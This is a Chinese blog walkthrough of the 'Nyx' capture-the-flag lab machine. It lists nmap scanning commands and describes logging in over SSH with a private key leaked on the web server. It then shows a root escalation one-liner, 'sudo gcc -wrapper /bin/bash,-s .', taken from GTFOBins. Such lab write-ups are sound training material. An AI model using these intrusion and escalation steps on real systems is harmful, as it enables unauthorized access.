vulhub-nyx

最新推荐文章于 2024-05-18 16:23:13 发布
最新推荐文章于 2024-05-18 16:23:13 发布
阅读量237 收藏 4
点赞数 5
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75378806/article/details/137824498
版权

这台靶机的主要知识点和思路:敏感信息泄露密钥,gcc提权

常规nmap扫描

nmap -sn 10.10.10.0/24    //主机发现
nmap -sT --min-rate 10000 10.10.10.154     //TCP全端口扫描
nmap -sT -sC -sV -O -p22,80 10.10.10.154      //用默认脚本扫描服务信息、操作系统版本
nmap --script=vuln -p22,80 10.10.10.154  //漏洞脚本扫描
nmap -sU --top-ports 20 10.10.10.154    //探测UDP最常见的20个端口的开放情况

扫描得到靶机Ip:10.10.10.154,开放端口22,80

这边的nmap漏洞脚本扫描暴露出一个.php目录(名字很长,值得怀疑)

先渗透80端口

web渗透

 没什么功能点,在准备目录爆破前,先看一下之前扫出来的.php目录

是一个私钥文件

ssh私钥连接

将它复制保存,我保存到isa文件里

使用前记得加权限,不然用不了

chmod 600 isa

ssh mpampis@10.10.10.15 -i rsa

用户是解密私钥猜测的

 

gcc提权

还是常规提权枚举

sudo -l看到感兴趣的东西,gcc, gcc是常见的C语言编译工具

GTFOBins

在该网站中可以找到它的利用方法

sudo gcc -wrapper /bin/bash,-s .

成功提权

kikifofo
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Nyx-开源
04-24
使用CORBALinux多媒体框架。 主要在C ++和Python中实现。
2020-10_Nyx
03-18
Nyx原位采样工作流程此示例中的工作流程图。一个使用Nyx , Ascent , Cinema数据库的原位创建以及后处理分析的示例的存储库。此工作流程中嵌入的构建说明来自的Ascent构建说明。此工作流使用spack从特定的提交构建...
vulnhub-Nyx: 1
kongshanzhi的博客
04-10 160
下载安装就不说了。
vulnhub nyx
aliexiansheng的博客
10-23 239
vulnhub nyx 今天分享一个简单的靶机 nyx,下载地址:点我下载 信息收集 攻击机IP:192.168.87.130 可以看到靶机ip为:192.168.87.128 探测服务以及端口 nmap -sV 192.168.87.128 nmap -p- 192.168.87.128 访问 80端口: 看一下源码文件: 提示说不要把时间浪费在 /robots.txt 等文件上,先看看再说。 看来真的不存在。尝试一下nikto。 没有什么很有价值的东西。扫目录也没有什么有用的东西。 用御剑扫了一
mac os 安装 Tor 命令行监视器 nyx
mixboot
08-02 1447
Nyx是Tor的命令行监视器 安装 nyx brew install nyx nyx --version nyx version 2.0.4 (released November 5, 2017) 宽带图 参考: 1.Nyx是Tor的命令行监视器
vulnhub:nyx靶机
qq_43884092的博客
01-14 206
靶机:192.168.111.152。
Vulnhub nyx靶机渗透记录
m0_43424471的博客
10-08 553
环境配置 nyx靶机镜像地址:http://www.vulnhub.com/entry/nyx-1,535/ Kali Linux IP: 192.168.1.128 nyx IP:192.168.1.137 信息收集 利用arp-scan,扫描本地局域网主机: arp-scan -l 利用nmap常规扫描目标主机: nmap -A -p- 192.168.1.137 利用dirb对站点目录进行枚举: dirb http://192.168.1.137 然而并没有找到有价值的界面,尝
靶机精讲之NYX
m0_63285023的博客
07-31 243
gcc编辑器,wrapper是包装器,包/bin/sh,传字符串过去-s(估计是)继续web渗透,访问admin目录。应用漏洞扫描的php路径去web。扫到的目录拿去web端查看。没有扫到有价值的信息。第一个指令shell。
nyx的配置使用
mxhsyyd的博客
09-17 782
1、安装pip命令 apt-get install python-pip 2、安装nyx pip install nyx 3、修改tor配置文件 cd /usr/local/etc/tor/ 进入文件所在目录 rm torrc.sample 删除原有无用文件 vim torrc 创建并编辑配置文件 #添加...
GCC-Inline-Assembly
MyBlog
09-19 672
GCC-Inline-Assembly-HOWTO
Git---安装、起步配置
浅瞳夜未的博客
11-08 166
            使用git 首先我们应该下去下载git仓库,下边我介绍在Linux 下载git仓库的一些基本配置。步骤如下: Git的三种状态:已提交(committed)、已修改(modified)和已暂存(staged)。Git 仓库目录是 Git 用来保存项目的元数据和对象数据库的地方。 这是 Git 中最重要的部分,从其它计算机克隆仓库时,拷贝的就是这里的数据。     基本...
精品商业计划书2020-nyx20160302good第一款的星战策略对战VR手游商业计划书.pdf
04-29
精品商业计划书2020-nyx20160302good第一款的星战策略对战VR手游商业计划书.pdf
id_nyx_
09-29
Network detector in java language to detect unauthorized attacks
nyx_ui:NYX用户界面
05-22
Nyx用户界面介绍NYX平台是易于使用的应用程序构建器,它集成了各种技术,例如: 弹性搜寻/ Kibana PostGreSQL Jupyter笔记本节点红Apache ActiveMQ 阿帕奇骆驼NYX UI包含可以创建以下页面的在线配置工具: Kibana...
使用MPLS解决BGP的路由黑洞(详解)
最新发布
qq_64302290的博客
05-18 234
我们知道在MPLS中数据的转发不再依靠路由表而是靠标签(注意:标签是在路由的基础上形成的)。所以在BGP中,我们依靠的就是这个特性来解决BGP的路由黑洞。BGP路由黑洞的解释:BGP的路由黑洞其实就是路由层面可达,数据层面不可达。(你可以收到对方的路由,但是不能和对方通讯。
计算机网络
zengkui198513的博客
05-15 315
上面的每一个问题是每一层都必须面对的也都必须要解决的。每一层而且必须要覆盖上面的信息!
云服务器遇到攻击怎么办,有哪些安全措施
dexunyun的博客
05-18 553
DDoS攻击对云服务器安全构成了严重威胁,但通过采取合适的防护策略,我们可以有效地降低攻击的影响。选择可靠的云服务提供商、部署DDoS防护服务是保护云服务器免受DDoS攻击的有效措施。德迅云安全提供了多种防护解决方案,可以帮助企业有效防止DDoS攻击,保护云服务器的安全,保障业务稳定。
netstat协议
lovemelovefish的博客
05-15 390
本机各端口的网络连接情况。
相机外参的确定\n已知量为三个灭点,求相机外参的旋转矩阵\n%%其中Xx,Xy,Xz代表三个灭点的横坐标\nYx,Yy,Yz代表三个灭点的纵坐标\nXx=1358\nXy=3107\nXz=153\nYx=2182\nYy=1540\nYz=913\nu0=(Yx-Yz+(Xz-Xy)/(Yz-Yy)Xx-(Xx-Xy)/(Yx-Yy)Xz)/((Xz-Xy)/(Yz-Yy)-(Xx-Xy)/(Yx-Yy))\nv0=Yz+((Xx-Xy)/(Yx-Yy))(Xz-u0)\nf=sqrt(-((Xz-u0)(Xx-u0)+(Yx-v0)(Yy-v0)))\nA=(sqrt(f.2+(Xy-u0).2+(Yy-v0).2)./sqrt(f.2+(Xz-u0).2+(Yz-v0).2))\na=atan(A)\nB=f/(sqrt((Xy-u0).2+(Yy-v0).2))\nb=atan(B)\nC=abs(Xx-u0)/abs(Yx-v0)\nc=atan©\nR1=[cos(a),0,-sin(a);\n0,1,0;\nsin(a),0,cos(a)]\nR2=[1,0,0;\n0,cos(b),-sin(b);\n0,sin(b),cos(b)];\nR3=[cos©,-sin©,0;\nsin©,cos©,0;\n0,0,1];\nR=R1R2*R3请用matlab代码实现上述内容
07-17
以下是使用MATLAB代码实现相机外参确定的过程: ```matlab % 已知灭点的横纵坐标 Xx = 1358; Xy = 3107; Xz = 153; Yx = 2182;...u0 = (Yx - Yz + (Xz - Xy)/(Yz - Yy)*Xx - (Xx - Xy)/(Yx - Yy)*Xz)/((Xz - Xy)/(Yz -...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值